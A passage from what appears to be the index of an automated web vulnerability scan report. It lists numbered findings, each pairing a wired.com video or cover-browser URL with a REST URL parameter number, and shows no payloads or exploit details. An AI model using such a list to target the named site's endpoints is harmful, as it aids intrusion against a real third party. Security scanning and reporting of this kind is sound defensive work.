1.630. http://www.wired.com/video/latest-videos/latest/1815816633/behind-the-scenes-doctor-who-the-hungry-earth/664817239001 [REST URL parameter 2]

1.631. http://www.wired.com/video/latest-videos/latest/1815816633/behind-the-scenes-doctor-who-the-hungry-earth/664817239001 [REST URL parameter 3]

1.632. http://www.wired.com/video/latest-videos/latest/1815816633/behind-the-scenes-doctor-who-the-hungry-earth/664817239001 [REST URL parameter 3]

1.633. http://www.wired.com/video/latest-videos/latest/1815816633/behind-the-scenes-doctor-who-the-hungry-earth/664817239001 [REST URL parameter 4]

1.634. http://www.wired.com/video/latest-videos/latest/1815816633/behind-the-scenes-doctor-who-the-hungry-earth/664817239001 [REST URL parameter 5]

1.635. http://www.wired.com/video/latest-videos/latest/1815816633/behind-the-scenes-doctor-who-the-hungry-earth/664817239001 [REST URL parameter 6]

1.636. http://www.wired.com/video/latest-videos/latest/1815816633/behind-the-scenes-of-atts-distaster-response-team/648526227001 [REST URL parameter 1]

1.637. http://www.wired.com/video/latest-videos/latest/1815816633/behind-the-scenes-of-atts-distaster-response-team/648526227001 [REST URL parameter 1]

1.638. http://www.wired.com/video/latest-videos/latest/1815816633/behind-the-scenes-of-atts-distaster-response-team/648526227001 [REST URL parameter 2]

1.639. http://www.wired.com/video/latest-videos/latest/1815816633/behind-the-scenes-of-atts-distaster-response-team/648526227001 [REST URL parameter 2]

1.640. http://www.wired.com/video/latest-videos/latest/1815816633/behind-the-scenes-of-atts-distaster-response-team/648526227001 [REST URL parameter 3]

1.641. http://www.wired.com/video/latest-videos/latest/1815816633/behind-the-scenes-of-atts-distaster-response-team/648526227001 [REST URL parameter 3]

1.642. http://www.wired.com/video/latest-videos/latest/1815816633/behind-the-scenes-of-atts-distaster-response-team/648526227001 [REST URL parameter 4]

1.643. http://www.wired.com/video/latest-videos/latest/1815816633/behind-the-scenes-of-atts-distaster-response-team/648526227001 [REST URL parameter 5]

1.644. http://www.wired.com/video/latest-videos/latest/1815816633/behind-the-scenes-of-atts-distaster-response-team/648526227001 [REST URL parameter 6]

1.645. http://www.wired.com/video/latest-videos/latest/1815816633/behind-the-scenes-of-harry-potter-and-the-deathly-hallows/650875857001 [REST URL parameter 1]

1.646. http://www.wired.com/video/latest-videos/latest/1815816633/behind-the-scenes-of-harry-potter-and-the-deathly-hallows/650875857001 [REST URL parameter 1]

1.647. http://www.wired.com/video/latest-videos/latest/1815816633/behind-the-scenes-of-harry-potter-and-the-deathly-hallows/650875857001 [REST URL parameter 2]

1.648. http://www.wired.com/video/latest-videos/latest/1815816633/behind-the-scenes-of-harry-potter-and-the-deathly-hallows/650875857001 [REST URL parameter 2]

1.649. http://www.wired.com/video/latest-videos/latest/1815816633/behind-the-scenes-of-harry-potter-and-the-deathly-hallows/650875857001 [REST URL parameter 3]

1.650. http://www.wired.com/video/latest-videos/latest/1815816633/behind-the-scenes-of-harry-potter-and-the-deathly-hallows/650875857001 [REST URL parameter 3]

1.651. http://www.wired.com/video/latest-videos/latest/1815816633/behind-the-scenes-of-harry-potter-and-the-deathly-hallows/650875857001 [REST URL parameter 4]

1.652. http://www.wired.com/video/latest-videos/latest/1815816633/behind-the-scenes-of-harry-potter-and-the-deathly-hallows/650875857001 [REST URL parameter 5]

1.653. http://www.wired.com/video/latest-videos/latest/1815816633/behind-the-scenes-of-harry-potter-and-the-deathly-hallows/650875857001 [REST URL parameter 6]

1.654. http://www.wired.com/video/latest-videos/latest/1815816633/call-of-duty--afghanistan/664893966001 [REST URL parameter 1]

1.655. http://www.wired.com/video/latest-videos/latest/1815816633/call-of-duty--afghanistan/664893966001 [REST URL parameter 1]

1.656. http://www.wired.com/video/latest-videos/latest/1815816633/call-of-duty--afghanistan/664893966001 [REST URL parameter 2]

1.657. http://www.wired.com/video/latest-videos/latest/1815816633/call-of-duty--afghanistan/664893966001 [REST URL parameter 2]

1.658. http://www.wired.com/video/latest-videos/latest/1815816633/call-of-duty--afghanistan/664893966001 [REST URL parameter 3]

1.659. http://www.wired.com/video/latest-videos/latest/1815816633/call-of-duty--afghanistan/664893966001 [REST URL parameter 3]

1.660. http://www.wired.com/video/latest-videos/latest/1815816633/call-of-duty--afghanistan/664893966001 [REST URL parameter 4]

1.661. http://www.wired.com/video/latest-videos/latest/1815816633/call-of-duty--afghanistan/664893966001 [REST URL parameter 5]

1.662. http://www.wired.com/video/latest-videos/latest/1815816633/call-of-duty--afghanistan/664893966001 [REST URL parameter 6]

1.663. http://www.wired.com/video/latest-videos/latest/1815816633/cast-and-crew-talk-tron-reboot-secondskin-light-suits/678922783001 [REST URL parameter 1]

1.664. http://www.wired.com/video/latest-videos/latest/1815816633/cast-and-crew-talk-tron-reboot-secondskin-light-suits/678922783001 [REST URL parameter 1]

1.665. http://www.wired.com/video/latest-videos/latest/1815816633/cast-and-crew-talk-tron-reboot-secondskin-light-suits/678922783001 [REST URL parameter 2]

1.666. http://www.wired.com/video/latest-videos/latest/1815816633/cast-and-crew-talk-tron-reboot-secondskin-light-suits/678922783001 [REST URL parameter 2]

1.667. http://www.wired.com/video/latest-videos/latest/1815816633/cast-and-crew-talk-tron-reboot-secondskin-light-suits/678922783001 [REST URL parameter 3]

1.668. http://www.wired.com/video/latest-videos/latest/1815816633/cast-and-crew-talk-tron-reboot-secondskin-light-suits/678922783001 [REST URL parameter 3]

1.669. http://www.wired.com/video/latest-videos/latest/1815816633/cast-and-crew-talk-tron-reboot-secondskin-light-suits/678922783001 [REST URL parameter 4]

1.670. http://www.wired.com/video/latest-videos/latest/1815816633/cast-and-crew-talk-tron-reboot-secondskin-light-suits/678922783001 [REST URL parameter 5]

1.671. http://www.wired.com/video/latest-videos/latest/1815816633/cast-and-crew-talk-tron-reboot-secondskin-light-suits/678922783001 [REST URL parameter 6]

1.672. http://www.wired.com/video/latest-videos/latest/1815816633/could-you-even-hear-anything-at-jon-stewarts-dc-rally/656445394001 [REST URL parameter 1]

1.673. http://www.wired.com/video/latest-videos/latest/1815816633/could-you-even-hear-anything-at-jon-stewarts-dc-rally/656445394001 [REST URL parameter 1]

1.674. http://www.wired.com/video/latest-videos/latest/1815816633/could-you-even-hear-anything-at-jon-stewarts-dc-rally/656445394001 [REST URL parameter 2]

1.675. http://www.wired.com/video/latest-videos/latest/1815816633/could-you-even-hear-anything-at-jon-stewarts-dc-rally/656445394001 [REST URL parameter 2]

1.676. http://www.wired.com/video/latest-videos/latest/1815816633/could-you-even-hear-anything-at-jon-stewarts-dc-rally/656445394001 [REST URL parameter 3]

1.677. http://www.wired.com/video/latest-videos/latest/1815816633/could-you-even-hear-anything-at-jon-stewarts-dc-rally/656445394001 [REST URL parameter 3]

1.678. http://www.wired.com/video/latest-videos/latest/1815816633/could-you-even-hear-anything-at-jon-stewarts-dc-rally/656445394001 [REST URL parameter 4]

1.679. http://www.wired.com/video/latest-videos/latest/1815816633/could-you-even-hear-anything-at-jon-stewarts-dc-rally/656445394001 [REST URL parameter 5]

1.680. http://www.wired.com/video/latest-videos/latest/1815816633/could-you-even-hear-anything-at-jon-stewarts-dc-rally/656445394001 [REST URL parameter 6]

1.681. http://www.wired.com/video/latest-videos/latest/1815816633/cowboys-and-aliens-trailer/681412282001 [REST URL parameter 1]

1.682. http://www.wired.com/video/latest-videos/latest/1815816633/cowboys-and-aliens-trailer/681412282001 [REST URL parameter 1]

1.683. http://www.wired.com/video/latest-videos/latest/1815816633/cowboys-and-aliens-trailer/681412282001 [REST URL parameter 2]

1.684. http://www.wired.com/video/latest-videos/latest/1815816633/cowboys-and-aliens-trailer/681412282001 [REST URL parameter 2]

1.685. http://www.wired.com/video/latest-videos/latest/1815816633/cowboys-and-aliens-trailer/681412282001 [REST URL parameter 3]

1.686. http://www.wired.com/video/latest-videos/latest/1815816633/cowboys-and-aliens-trailer/681412282001 [REST URL parameter 3]

1.687. http://www.wired.com/video/latest-videos/latest/1815816633/cowboys-and-aliens-trailer/681412282001 [REST URL parameter 4]

1.688. http://www.wired.com/video/latest-videos/latest/1815816633/cowboys-and-aliens-trailer/681412282001 [REST URL parameter 5]

1.689. http://www.wired.com/video/latest-videos/latest/1815816633/cowboys-and-aliens-trailer/681412282001 [REST URL parameter 6]

1.690. http://www.wired.com/video/latest-videos/latest/1815816633/danny-boyle-traps-james-franco-in-chasm-for-127-hours/650949108001 [REST URL parameter 1]

1.691. http://www.wired.com/video/latest-videos/latest/1815816633/danny-boyle-traps-james-franco-in-chasm-for-127-hours/650949108001 [REST URL parameter 1]

1.692. http://www.wired.com/video/latest-videos/latest/1815816633/danny-boyle-traps-james-franco-in-chasm-for-127-hours/650949108001 [REST URL parameter 2]

1.693. http://www.wired.com/video/latest-videos/latest/1815816633/danny-boyle-traps-james-franco-in-chasm-for-127-hours/650949108001 [REST URL parameter 2]

1.694. http://www.wired.com/video/latest-videos/latest/1815816633/danny-boyle-traps-james-franco-in-chasm-for-127-hours/650949108001 [REST URL parameter 3]

1.695. http://www.wired.com/video/latest-videos/latest/1815816633/danny-boyle-traps-james-franco-in-chasm-for-127-hours/650949108001 [REST URL parameter 3]

1.696. http://www.wired.com/video/latest-videos/latest/1815816633/danny-boyle-traps-james-franco-in-chasm-for-127-hours/650949108001 [REST URL parameter 4]

1.697. http://www.wired.com/video/latest-videos/latest/1815816633/danny-boyle-traps-james-franco-in-chasm-for-127-hours/650949108001 [REST URL parameter 5]

1.698. http://www.wired.com/video/latest-videos/latest/1815816633/danny-boyle-traps-james-franco-in-chasm-for-127-hours/650949108001 [REST URL parameter 6]

1.699. http://www.wired.com/video/latest-videos/latest/1815816633/disneys-cars-2-goes-international/677756918001 [REST URL parameter 1]

1.700. http://www.wired.com/video/latest-videos/latest/1815816633/disneys-cars-2-goes-international/677756918001 [REST URL parameter 1]

1.701. http://www.wired.com/video/latest-videos/latest/1815816633/disneys-cars-2-goes-international/677756918001 [REST URL parameter 2]

1.702. http://www.wired.com/video/latest-videos/latest/1815816633/disneys-cars-2-goes-international/677756918001 [REST URL parameter 2]

1.703. http://www.wired.com/video/latest-videos/latest/1815816633/disneys-cars-2-goes-international/677756918001 [REST URL parameter 3]

1.704. http://www.wired.com/video/latest-videos/latest/1815816633/disneys-cars-2-goes-international/677756918001 [REST URL parameter 3]

1.705. http://www.wired.com/video/latest-videos/latest/1815816633/disneys-cars-2-goes-international/677756918001 [REST URL parameter 4]

1.706. http://www.wired.com/video/latest-videos/latest/1815816633/disneys-cars-2-goes-international/677756918001 [REST URL parameter 5]

1.707. http://www.wired.com/video/latest-videos/latest/1815816633/disneys-cars-2-goes-international/677756918001 [REST URL parameter 6]

1.708. http://www.wired.com/video/latest-videos/latest/1815816633/glab-galaxy-tab-windows-phone-7-boxee-box/673489628001 [REST URL parameter 1]

1.709. http://www.wired.com/video/latest-videos/latest/1815816633/glab-galaxy-tab-windows-phone-7-boxee-box/673489628001 [REST URL parameter 1]

1.710. http://www.wired.com/video/latest-videos/latest/1815816633/glab-galaxy-tab-windows-phone-7-boxee-box/673489628001 [REST URL parameter 2]

1.711. http://www.wired.com/video/latest-videos/latest/1815816633/glab-galaxy-tab-windows-phone-7-boxee-box/673489628001 [REST URL parameter 2]

1.712. http://www.wired.com/video/latest-videos/latest/1815816633/glab-galaxy-tab-windows-phone-7-boxee-box/673489628001 [REST URL parameter 3]

1.713. http://www.wired.com/video/latest-videos/latest/1815816633/glab-galaxy-tab-windows-phone-7-boxee-box/673489628001 [REST URL parameter 3]

1.714. http://www.wired.com/video/latest-videos/latest/1815816633/glab-galaxy-tab-windows-phone-7-boxee-box/673489628001 [REST URL parameter 4]

1.715. http://www.wired.com/video/latest-videos/latest/1815816633/glab-galaxy-tab-windows-phone-7-boxee-box/673489628001 [REST URL parameter 5]

1.716. http://www.wired.com/video/latest-videos/latest/1815816633/glab-galaxy-tab-windows-phone-7-boxee-box/673489628001 [REST URL parameter 6]

1.717. http://www.wired.com/video/latest-videos/latest/1815816633/glab-microsoft-kinect-fall-test-skyfire/660653903001 [REST URL parameter 1]

1.718. http://www.wired.com/video/latest-videos/latest/1815816633/glab-microsoft-kinect-fall-test-skyfire/660653903001 [REST URL parameter 1]

1.719. http://www.wired.com/video/latest-videos/latest/1815816633/glab-microsoft-kinect-fall-test-skyfire/660653903001 [REST URL parameter 2]

1.720. http://www.wired.com/video/latest-videos/latest/1815816633/glab-microsoft-kinect-fall-test-skyfire/660653903001 [REST URL parameter 2]

1.721. http://www.wired.com/video/latest-videos/latest/1815816633/glab-microsoft-kinect-fall-test-skyfire/660653903001 [REST URL parameter 3]

1.722. http://www.wired.com/video/latest-videos/latest/1815816633/glab-microsoft-kinect-fall-test-skyfire/660653903001 [REST URL parameter 3]

1.723. http://www.wired.com/video/latest-videos/latest/1815816633/glab-microsoft-kinect-fall-test-skyfire/660653903001 [REST URL parameter 4]

1.724. http://www.wired.com/video/latest-videos/latest/1815816633/glab-microsoft-kinect-fall-test-skyfire/660653903001 [REST URL parameter 5]

1.725. http://www.wired.com/video/latest-videos/latest/1815816633/glab-microsoft-kinect-fall-test-skyfire/660653903001 [REST URL parameter 6]

1.726. http://www.wired.com/video/latest-videos/latest/1815816633/green-lantern-theatrical-trailer/680254055001 [REST URL parameter 1]

1.727. http://www.wired.com/video/latest-videos/latest/1815816633/green-lantern-theatrical-trailer/680254055001 [REST URL parameter 1]

1.728. http://www.wired.com/video/latest-videos/latest/1815816633/green-lantern-theatrical-trailer/680254055001 [REST URL parameter 2]

1.729. http://www.wired.com/video/latest-videos/latest/1815816633/green-lantern-theatrical-trailer/680254055001 [REST URL parameter 2]

1.730. http://www.wired.com/video/latest-videos/latest/1815816633/green-lantern-theatrical-trailer/680254055001 [REST URL parameter 3]

1.731. http://www.wired.com/video/latest-videos/latest/1815816633/green-lantern-theatrical-trailer/680254055001 [REST URL parameter 3]

1.732. http://www.wired.com/video/latest-videos/latest/1815816633/green-lantern-theatrical-trailer/680254055001 [REST URL parameter 4]

1.733. http://www.wired.com/video/latest-videos/latest/1815816633/green-lantern-theatrical-trailer/680254055001 [REST URL parameter 5]

1.734. http://www.wired.com/video/latest-videos/latest/1815816633/green-lantern-theatrical-trailer/680254055001 [REST URL parameter 6]

1.735. http://www.wired.com/video/latest-videos/latest/1815816633/laserguided-rocket-launchers/660659848001 [REST URL parameter 1]

1.736. http://www.wired.com/video/latest-videos/latest/1815816633/laserguided-rocket-launchers/660659848001 [REST URL parameter 1]

1.737. http://www.wired.com/video/latest-videos/latest/1815816633/laserguided-rocket-launchers/660659848001 [REST URL parameter 2]

1.738. http://www.wired.com/video/latest-videos/latest/1815816633/laserguided-rocket-launchers/660659848001 [REST URL parameter 2]

1.739. http://www.wired.com/video/latest-videos/latest/1815816633/laserguided-rocket-launchers/660659848001 [REST URL parameter 3]

1.740. http://www.wired.com/video/latest-videos/latest/1815816633/laserguided-rocket-launchers/660659848001 [REST URL parameter 3]

1.741. http://www.wired.com/video/latest-videos/latest/1815816633/laserguided-rocket-launchers/660659848001 [REST URL parameter 4]

1.742. http://www.wired.com/video/latest-videos/latest/1815816633/laserguided-rocket-launchers/660659848001 [REST URL parameter 5]

1.743. http://www.wired.com/video/latest-videos/latest/1815816633/laserguided-rocket-launchers/660659848001 [REST URL parameter 6]

1.744. http://www.wired.com/video/latest-videos/latest/1815816633/lockheed-shows-off-hulc-exoskeleton-at-asus/652164127001 [REST URL parameter 1]

1.745. http://www.wired.com/video/latest-videos/latest/1815816633/lockheed-shows-off-hulc-exoskeleton-at-asus/652164127001 [REST URL parameter 1]

1.746. http://www.wired.com/video/latest-videos/latest/1815816633/lockheed-shows-off-hulc-exoskeleton-at-asus/652164127001 [REST URL parameter 2]

1.747. http://www.wired.com/video/latest-videos/latest/1815816633/lockheed-shows-off-hulc-exoskeleton-at-asus/652164127001 [REST URL parameter 2]

1.748. http://www.wired.com/video/latest-videos/latest/1815816633/lockheed-shows-off-hulc-exoskeleton-at-asus/652164127001 [REST URL parameter 3]

1.749. http://www.wired.com/video/latest-videos/latest/1815816633/lockheed-shows-off-hulc-exoskeleton-at-asus/652164127001 [REST URL parameter 3]

1.750. http://www.wired.com/video/latest-videos/latest/1815816633/lockheed-shows-off-hulc-exoskeleton-at-asus/652164127001 [REST URL parameter 4]

1.751. http://www.wired.com/video/latest-videos/latest/1815816633/lockheed-shows-off-hulc-exoskeleton-at-asus/652164127001 [REST URL parameter 5]

1.752. http://www.wired.com/video/latest-videos/latest/1815816633/lockheed-shows-off-hulc-exoskeleton-at-asus/652164127001 [REST URL parameter 6]

1.753. http://www.wired.com/video/latest-videos/latest/1815816633/make-drones-almost-invincible/660704541001 [REST URL parameter 1]

1.754. http://www.wired.com/video/latest-videos/latest/1815816633/make-drones-almost-invincible/660704541001 [REST URL parameter 1]

1.755. http://www.wired.com/video/latest-videos/latest/1815816633/make-drones-almost-invincible/660704541001 [REST URL parameter 2]

1.756. http://www.wired.com/video/latest-videos/latest/1815816633/make-drones-almost-invincible/660704541001 [REST URL parameter 2]

1.757. http://www.wired.com/video/latest-videos/latest/1815816633/make-drones-almost-invincible/660704541001 [REST URL parameter 3]

1.758. http://www.wired.com/video/latest-videos/latest/1815816633/make-drones-almost-invincible/660704541001 [REST URL parameter 3]

1.759. http://www.wired.com/video/latest-videos/latest/1815816633/make-drones-almost-invincible/660704541001 [REST URL parameter 4]

1.760. http://www.wired.com/video/latest-videos/latest/1815816633/make-drones-almost-invincible/660704541001 [REST URL parameter 5]

1.761. http://www.wired.com/video/latest-videos/latest/1815816633/make-drones-almost-invincible/660704541001 [REST URL parameter 6]

1.762. http://www.wired.com/video/latest-videos/latest/1815816633/making-the-soundtrack-harry-potter-and-the-deathly-hallows/653378922001 [REST URL parameter 1]

1.763. http://www.wired.com/video/latest-videos/latest/1815816633/making-the-soundtrack-harry-potter-and-the-deathly-hallows/653378922001 [REST URL parameter 1]

1.764. http://www.wired.com/video/latest-videos/latest/1815816633/making-the-soundtrack-harry-potter-and-the-deathly-hallows/653378922001 [REST URL parameter 2]

1.765. http://www.wired.com/video/latest-videos/latest/1815816633/making-the-soundtrack-harry-potter-and-the-deathly-hallows/653378922001 [REST URL parameter 2]

1.766. http://www.wired.com/video/latest-videos/latest/1815816633/making-the-soundtrack-harry-potter-and-the-deathly-hallows/653378922001 [REST URL parameter 3]

1.767. http://www.wired.com/video/latest-videos/latest/1815816633/making-the-soundtrack-harry-potter-and-the-deathly-hallows/653378922001 [REST URL parameter 3]

1.768. http://www.wired.com/video/latest-videos/latest/1815816633/making-the-soundtrack-harry-potter-and-the-deathly-hallows/653378922001 [REST URL parameter 4]

1.769. http://www.wired.com/video/latest-videos/latest/1815816633/making-the-soundtrack-harry-potter-and-the-deathly-hallows/653378922001 [REST URL parameter 5]

1.770. http://www.wired.com/video/latest-videos/latest/1815816633/making-the-soundtrack-harry-potter-and-the-deathly-hallows/653378922001 [REST URL parameter 6]

1.771. http://www.wired.com/video/latest-videos/latest/1815816633/noire-thriller-set-in-seedy-los-angeles-of-the-40s/672339556001 [REST URL parameter 1]

1.772. http://www.wired.com/video/latest-videos/latest/1815816633/noire-thriller-set-in-seedy-los-angeles-of-the-40s/672339556001 [REST URL parameter 1]

1.773. http://www.wired.com/video/latest-videos/latest/1815816633/noire-thriller-set-in-seedy-los-angeles-of-the-40s/672339556001 [REST URL parameter 2]

1.774. http://www.wired.com/video/latest-videos/latest/1815816633/noire-thriller-set-in-seedy-los-angeles-of-the-40s/672339556001 [REST URL parameter 2]

1.775. http://www.wired.com/video/latest-videos/latest/1815816633/noire-thriller-set-in-seedy-los-angeles-of-the-40s/672339556001 [REST URL parameter 3]

1.776. http://www.wired.com/video/latest-videos/latest/1815816633/noire-thriller-set-in-seedy-los-angeles-of-the-40s/672339556001 [REST URL parameter 3]

1.777. http://www.wired.com/video/latest-videos/latest/1815816633/noire-thriller-set-in-seedy-los-angeles-of-the-40s/672339556001 [REST URL parameter 4]

1.778. http://www.wired.com/video/latest-videos/latest/1815816633/noire-thriller-set-in-seedy-los-angeles-of-the-40s/672339556001 [REST URL parameter 5]

1.779. http://www.wired.com/video/latest-videos/latest/1815816633/noire-thriller-set-in-seedy-los-angeles-of-the-40s/672339556001 [REST URL parameter 6]

1.780. http://www.wired.com/video/latest-videos/latest/1815816633/the-gun-of-the-future-for-the-truck-of-the-future/660683999001 [REST URL parameter 1]

1.781. http://www.wired.com/video/latest-videos/latest/1815816633/the-gun-of-the-future-for-the-truck-of-the-future/660683999001 [REST URL parameter 1]

1.782. http://www.wired.com/video/latest-videos/latest/1815816633/the-gun-of-the-future-for-the-truck-of-the-future/660683999001 [REST URL parameter 2]

1.783. http://www.wired.com/video/latest-videos/latest/1815816633/the-gun-of-the-future-for-the-truck-of-the-future/660683999001 [REST URL parameter 2]

1.784. http://www.wired.com/video/latest-videos/latest/1815816633/the-gun-of-the-future-for-the-truck-of-the-future/660683999001 [REST URL parameter 3]

1.785. http://www.wired.com/video/latest-videos/latest/1815816633/the-gun-of-the-future-for-the-truck-of-the-future/660683999001 [REST URL parameter 3]

1.786. http://www.wired.com/video/latest-videos/latest/1815816633/the-gun-of-the-future-for-the-truck-of-the-future/660683999001 [REST URL parameter 4]

1.787. http://www.wired.com/video/latest-videos/latest/1815816633/the-gun-of-the-future-for-the-truck-of-the-future/660683999001 [REST URL parameter 5]

1.788. http://www.wired.com/video/latest-videos/latest/1815816633/the-gun-of-the-future-for-the-truck-of-the-future/660683999001 [REST URL parameter 6]

1.789. http://www.wired.com/video/latest-videos/latest/1815816633/tron-legacy--the-payoff/666144939001 [REST URL parameter 1]

1.790. http://www.wired.com/video/latest-videos/latest/1815816633/tron-legacy--the-payoff/666144939001 [REST URL parameter 1]

1.791. http://www.wired.com/video/latest-videos/latest/1815816633/tron-legacy--the-payoff/666144939001 [REST URL parameter 2]

1.792. http://www.wired.com/video/latest-videos/latest/1815816633/tron-legacy--the-payoff/666144939001 [REST URL parameter 2]

1.793. http://www.wired.com/video/latest-videos/latest/1815816633/tron-legacy--the-payoff/666144939001 [REST URL parameter 3]

1.794. http://www.wired.com/video/latest-videos/latest/1815816633/tron-legacy--the-payoff/666144939001 [REST URL parameter 3]

1.795. http://www.wired.com/video/latest-videos/latest/1815816633/tron-legacy--the-payoff/666144939001 [REST URL parameter 4]

1.796. http://www.wired.com/video/latest-videos/latest/1815816633/tron-legacy--the-payoff/666144939001 [REST URL parameter 5]

1.797. http://www.wired.com/video/latest-videos/latest/1815816633/tron-legacy--the-payoff/666144939001 [REST URL parameter 6]

1.798. http://www.wired.com/video/latest-videos/latest/1815816633/tron-legacy-clip-long-time/664849976001 [REST URL parameter 1]

1.799. http://www.wired.com/video/latest-videos/latest/1815816633/tron-legacy-clip-long-time/664849976001 [REST URL parameter 1]

1.800. http://www.wired.com/video/latest-videos/latest/1815816633/tron-legacy-clip-long-time/664849976001 [REST URL parameter 2]

1.801. http://www.wired.com/video/latest-videos/latest/1815816633/tron-legacy-clip-long-time/664849976001 [REST URL parameter 2]

1.802. http://www.wired.com/video/latest-videos/latest/1815816633/tron-legacy-clip-long-time/664849976001 [REST URL parameter 3]

1.803. http://www.wired.com/video/latest-videos/latest/1815816633/tron-legacy-clip-long-time/664849976001 [REST URL parameter 3]

1.804. http://www.wired.com/video/latest-videos/latest/1815816633/tron-legacy-clip-long-time/664849976001 [REST URL parameter 4]

1.805. http://www.wired.com/video/latest-videos/latest/1815816633/tron-legacy-clip-long-time/664849976001 [REST URL parameter 5]

1.806. http://www.wired.com/video/latest-videos/latest/1815816633/tron-legacy-clip-long-time/664849976001 [REST URL parameter 6]

1.807. http://www.wired.com/video/latest-videos/latest/1815816633/tron-legacy-clip-quorra-saves-sam/653193147001 [REST URL parameter 1]

1.808. http://www.wired.com/video/latest-videos/latest/1815816633/tron-legacy-clip-quorra-saves-sam/653193147001 [REST URL parameter 1]

1.809. http://www.wired.com/video/latest-videos/latest/1815816633/tron-legacy-clip-quorra-saves-sam/653193147001 [REST URL parameter 2]

1.810. http://www.wired.com/video/latest-videos/latest/1815816633/tron-legacy-clip-quorra-saves-sam/653193147001 [REST URL parameter 2]

1.811. http://www.wired.com/video/latest-videos/latest/1815816633/tron-legacy-clip-quorra-saves-sam/653193147001 [REST URL parameter 3]

1.812. http://www.wired.com/video/latest-videos/latest/1815816633/tron-legacy-clip-quorra-saves-sam/653193147001 [REST URL parameter 3]

1.813. http://www.wired.com/video/latest-videos/latest/1815816633/tron-legacy-clip-quorra-saves-sam/653193147001 [REST URL parameter 4]

1.814. http://www.wired.com/video/latest-videos/latest/1815816633/tron-legacy-clip-quorra-saves-sam/653193147001 [REST URL parameter 5]

1.815. http://www.wired.com/video/latest-videos/latest/1815816633/tron-legacy-clip-quorra-saves-sam/653193147001 [REST URL parameter 6]

1.816. http://www.wired.com/video/latest-videos/latest/1815816633/wearable-computers-for-soldiers/660701101001 [REST URL parameter 1]

1.817. http://www.wired.com/video/latest-videos/latest/1815816633/wearable-computers-for-soldiers/660701101001 [REST URL parameter 1]

1.818. http://www.wired.com/video/latest-videos/latest/1815816633/wearable-computers-for-soldiers/660701101001 [REST URL parameter 2]

1.819. http://www.wired.com/video/latest-videos/latest/1815816633/wearable-computers-for-soldiers/660701101001 [REST URL parameter 2]

1.820. http://www.wired.com/video/latest-videos/latest/1815816633/wearable-computers-for-soldiers/660701101001 [REST URL parameter 3]

1.821. http://www.wired.com/video/latest-videos/latest/1815816633/wearable-computers-for-soldiers/660701101001 [REST URL parameter 3]

1.822. http://www.wired.com/video/latest-videos/latest/1815816633/wearable-computers-for-soldiers/660701101001 [REST URL parameter 4]

1.823. http://www.wired.com/video/latest-videos/latest/1815816633/wearable-computers-for-soldiers/660701101001 [REST URL parameter 5]

1.824. http://www.wired.com/video/latest-videos/latest/1815816633/wearable-computers-for-soldiers/660701101001 [REST URL parameter 6]

1.825. http://www.wired.com/video/making-the-soundtrack-harry-potter-and-the-deathly-hallows/653378922001 [REST URL parameter 1]

1.826. http://www.wired.com/video/making-the-soundtrack-harry-potter-and-the-deathly-hallows/653378922001 [REST URL parameter 1]

1.827. http://www.wired.com/video/making-the-soundtrack-harry-potter-and-the-deathly-hallows/653378922001 [REST URL parameter 2]

1.828. http://www.wired.com/video/making-the-soundtrack-harry-potter-and-the-deathly-hallows/653378922001 [REST URL parameter 2]

1.829. http://www.wired.com/video/making-the-soundtrack-harry-potter-and-the-deathly-hallows/653378922001 [REST URL parameter 3]

1.830. http://www.wired.com/video/making-the-soundtrack-harry-potter-and-the-deathly-hallows/653378922001 [REST URL parameter 3]

1.831. http://www.wired.com/video/october-madness-meets-sharktoberfest/637752381001 [REST URL parameter 1]

1.832. http://www.wired.com/video/october-madness-meets-sharktoberfest/637752381001 [REST URL parameter 1]

1.833. http://www.wired.com/video/october-madness-meets-sharktoberfest/637752381001 [REST URL parameter 2]

1.834. http://www.wired.com/video/october-madness-meets-sharktoberfest/637752381001 [REST URL parameter 2]

1.835. http://www.wired.com/video/october-madness-meets-sharktoberfest/637752381001 [REST URL parameter 3]

1.836. http://www.wired.com/video/october-madness-meets-sharktoberfest/637752381001 [REST URL parameter 3]

1.837. http://www.wired.com/video/reddit [REST URL parameter 1]

1.838. http://www.wired.com/video/reddit [REST URL parameter 2]

1.839. http://www.wired.com/video/reddit [REST URL parameter 2]

1.840. http://www.wired.com/video/science [REST URL parameter 1]

1.841. http://www.wired.com/video/science [REST URL parameter 2]

1.842. http://www.wired.com/video/science [REST URL parameter 2]

1.843. http://www.wired.com/video/search/ [REST URL parameter 1]

1.844. http://www.wired.com/video/search/ [REST URL parameter 2]

1.845. http://www.wired.com/video/search/ [REST URL parameter 2]

1.846. http://www.wired.com/video/security [REST URL parameter 1]

1.847. http://www.wired.com/video/security [REST URL parameter 2]

1.848. http://www.wired.com/video/security [REST URL parameter 2]

1.849. http://www.wired.com/video/stars-line-up-for-tron-game--evolution/645408465001 [REST URL parameter 1]

1.850. http://www.wired.com/video/stars-line-up-for-tron-game--evolution/645408465001 [REST URL parameter 1]

1.851. http://www.wired.com/video/stars-line-up-for-tron-game--evolution/645408465001 [REST URL parameter 2]

1.852. http://www.wired.com/video/stars-line-up-for-tron-game--evolution/645408465001 [REST URL parameter 2]

1.853. http://www.wired.com/video/stars-line-up-for-tron-game--evolution/645408465001 [REST URL parameter 3]

1.854. http://www.wired.com/video/stars-line-up-for-tron-game--evolution/645408465001 [REST URL parameter 3]

1.855. http://www.wired.com/video/the-casting-of-galaxy-quest/21738564001 [REST URL parameter 1]

1.856. http://www.wired.com/video/the-casting-of-galaxy-quest/21738564001 [REST URL parameter 1]

1.857. http://www.wired.com/video/the-casting-of-galaxy-quest/21738564001 [REST URL parameter 2]

1.858. http://www.wired.com/video/the-casting-of-galaxy-quest/21738564001 [REST URL parameter 2]

1.859. http://www.wired.com/video/the-casting-of-galaxy-quest/21738564001 [REST URL parameter 3]

1.860. http://www.wired.com/video/the-casting-of-galaxy-quest/21738564001 [REST URL parameter 3]

1.861. http://www.wired.com/video/wired-magazine [REST URL parameter 1]

1.862. http://www.wired.com/video/wired-magazine [REST URL parameter 1]

1.863. http://www.wired.com/video/wired-magazine [REST URL parameter 2]

1.864. http://www.wired.com/video/wired-magazine [REST URL parameter 2]

1.865. http://www.wired.com/wired/coverbrowser/ [REST URL parameter 2]

1.866. http://www.wired.com/wired/coverbrowser/1993 [REST URL parameter 2]

1.867. http://www.wired.com/wired/coverbrowser/1993 [REST URL parameter 3]

1.868. http://www.wired.com/wired/coverbrowser/1994 [REST URL parameter 2]

1.869. http://www.wired.com/wired/coverbrowser/1994 [REST URL parameter 3]

1.870. http://www.wired.com/wired/coverbrowser/1995 [REST URL parameter 2]

1.871. http://www.wired.com/wired/coverbrowser/1995 [REST URL parameter 3]

